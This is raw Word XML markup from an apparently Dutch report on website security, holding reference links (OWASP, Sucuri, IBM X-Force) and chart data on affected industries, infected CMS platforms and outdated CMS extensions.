    <w:div w:id="729693501">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="824124501">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="850143773">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="974722344">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1145201387">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1239050874">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1305083974">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1331985689">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1346129039">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1460757079">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1654993135">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1754661424">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1943416191">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2058625439">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="211119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diagramData" Target="diagrams/data1.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:8000" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:8000" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:81" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.jp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50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.png"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.webshop.nl?query=payload" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.png"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image50.png"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image51.png"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image52.png"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image53.png"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image54.png"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sucuri.net/website-security/Reports/Sucuri-Website-Hacked-Report-2016Q1.pdf" TargetMode="External"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://assets.documentcloud.org/documents/3527813/IBM-XForce-Index-2017-FINAL.pdf" TargetMode="External"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://essextec.com/wp-content/uploads/2015/09/xforcereport2q2014.pdf" TargetMode="External"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://projects.webappsec.org/w/page/13246978/Threat%20Classification" TargetMode="External"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.testwebsite.nl/redirect.php?id=http://testlink.nl" TargetMode="External"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image55.png"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image56.png"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image57.png"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramLayout" Target="diagrams/layout1.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramQuickStyle" Target="diagrams/quickStyle1.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramColors" Target="diagrams/colors1.xml"/><Relationship Id="rId23" Type="http://schemas.microsoft.com/office/2007/relationships/diagramDrawing" Target="diagrams/drawing1.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/chart" Target="charts/chart1.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/chart" Target="charts/chart2.xml"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/chart" Target="charts/chart3.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.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0.svg"/><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image" Target="media/image27.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.png"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.png"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.png"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43.png"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image44.png"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image45.png"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image46.png"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image47.png"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image48.png"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image49.png"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project" TargetMode="External"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.sectoolmarket.com/price-and-feature-comparison-of-web-application-scanners-unified-list.html" TargetMode="External"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://pc-en-internet.infonu.nl/geschiedenis/84250-het-web-web-10-web-20-web-30.html" TargetMode="External"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ibm.com/security/data-breach/" TargetMode="External"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:Vulnerability_Scanning_Tools" TargetMode="External"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.acunetix.com/resources/wvsbrochure.pdf" TargetMode="External"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://torquemag.io/2016/10/13-surprising-wordpress-statistics-updated-2016/" TargetMode="External"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ithemes.com/2017/01/16/wordpress-security-issues/" TargetMode="External"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.techempower.com/benchmarks/" TargetMode="External"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sitepoint.com/best-php-framework-2015-sitepoint-survey-results/" TargetMode="Externa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Meest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" baseline="0"/>
              <a:t> gedupeerde industrieën</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Blad1!$B$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Industrieën</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent1"/>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Blad1!$B$2:$B$14</c:f>
              <c:numCache>
                <c:formatCode>0.00%</c:formatCode>
                <c:ptCount val="13"/>
                <c:pt idx="0" formatCode="0%">
                  <c:v>0.302</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>0.147</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>0.092</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>0.085</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>0.077</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>0.077</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>0.074</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>0.048</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>0.048</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>0.022</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>0.018</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>0.007</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>0.004</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst xmlns:c16r2="http://schemas.microsoft.com/office/drawing/2015/06/chart">
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000000-37A7-4920-91BB-9BF3E861C43C}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>Blad1!$C$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Kolom1</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent2"/>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Blad1!$C$2:$C$14</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="13"/>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst xmlns:c16r2="http://schemas.microsoft.com/office/drawing/2015/06/chart">
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000001-37A7-4920-91BB-9BF3E861C43C}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="2"/>
          <c:order val="2"/>
          <c:tx>
            <c:strRef>
              <c:f>Blad1!$D$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Kolom2</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent3"/>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Blad1!$D$2:$D$14</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="13"/>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst xmlns:c16r2="http://schemas.microsoft.com/office/drawing/2015/06/chart">
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000002-37A7-4920-91BB-9BF3E861C43C}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:gapWidth val="150"/>
        <c:shape val="box"/>
        <c:axId val="1753347152"/>
        <c:axId val="1753348928"/>
        <c:axId val="0"/>
      </c:bar3DChart>
      <c:catAx>
        <c:axId val="175334715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753348928"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="175334892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753347152"/>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Geïnfecteerde CMS platformen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barChart>
        <c:barDir val="bar"/>
        <c:grouping val="clustered"/>
        <c:varyColors val="0"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>Blad1!$B$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Aantal geïnfecteerde websites</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent1"/>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Blad1!$B$2:$B$7</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="6"/>
                <c:pt idx="0">
                  <c:v>12.0</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>20.0</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>200.0</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>600.0</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>1600.0</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>8900.0</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst xmlns:c16r2="http://schemas.microsoft.com/office/drawing/2015/06/chart">
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000000-A822-40FD-A626-75D13D1EAA18}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>Blad1!$C$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Kolom1</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent2"/>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Blad1!$C$2:$C$7</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="6"/>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst xmlns:c16r2="http://schemas.microsoft.com/office/drawing/2015/06/chart">
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000001-A822-40FD-A626-75D13D1EAA18}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="2"/>
          <c:order val="2"/>
          <c:tx>
            <c:strRef>
              <c:f>Blad1!$D$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Kolom2</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent3"/>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Blad1!$D$2:$D$7</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="6"/>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst xmlns:c16r2="http://schemas.microsoft.com/office/drawing/2015/06/chart">
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000002-A822-40FD-A626-75D13D1EAA18}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:gapWidth val="182"/>
        <c:axId val="1754512352"/>
        <c:axId val="1754441088"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="175451235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754441088"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="17544410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754512352"/>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Out-of-date</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" baseline="0"/>
              <a:t> extensies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Blad1!$B$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Outdated</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst/>
            <a:sp3d/>
          </c:spPr>
          <c:invertIfNegative val="0"/>
          <c:cat>
            <c:strRef>
              <c:f>Blad1!$A$2:$A$5</c:f>
              <c:strCache>
                <c:ptCount val="4"/>
                <c:pt idx="0">
                  <c:v>Drupal</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Magento</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>Joombla</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>Wordpress</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Blad1!$B$2:$B$5</c:f>
              <c:numCache>
                <c:formatCode>0%</c:formatCode>
                <c:ptCount val="4"/>
                <c:pt idx="0">
                  <c:v>0.81</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>0.97</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>0.85</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>0.56</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst xmlns:c16r2="http://schemas.microsoft.com/office/drawing/2015/06/chart">
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000000-0B75-434D-86C3-81A2DDD4BA15}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>Blad1!$C$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Kolom1</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst/>
            <a:sp3d/>
          </c:spPr>
          <c:invertIfNegative val="0"/>
          <c:cat>
            <c:strRef>
              <c:f>Blad1!$A$2:$A$5</c:f>
              <c:strCache>
                <c:ptCount val="4"/>
                <c:pt idx="0">
                  <c:v>Drupal</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Magento</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>Joombla</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>Wordpress</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Blad1!$C$2:$C$5</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="4"/>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst xmlns:c16r2="http://schemas.microsoft.com/office/drawing/2015/06/chart">
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000001-0B75-434D-86C3-81A2DDD4BA15}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="2"/>
          <c:order val="2"/>
          <c:tx>
            <c:strRef>
              <c:f>Blad1!$D$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Kolom2</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent3"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst/>
            <a:sp3d/>
          </c:spPr>
          <c:invertIfNegative val="0"/>
          <c:cat>
            <c:strRef>
              <c:f>Blad1!$A$2:$A$5</c:f>
              <c:strCache>
                <c:ptCount val="4"/>
                <c:pt idx="0">
                  <c:v>Drupal</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Magento</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>Joombla</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>Wordpress</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Blad1!$D$2:$D$5</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="4"/>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst xmlns:c16r2="http://schemas.microsoft.com/office/drawing/2015/06/chart">
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000002-0B75-434D-86C3-81A2DDD4BA15}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
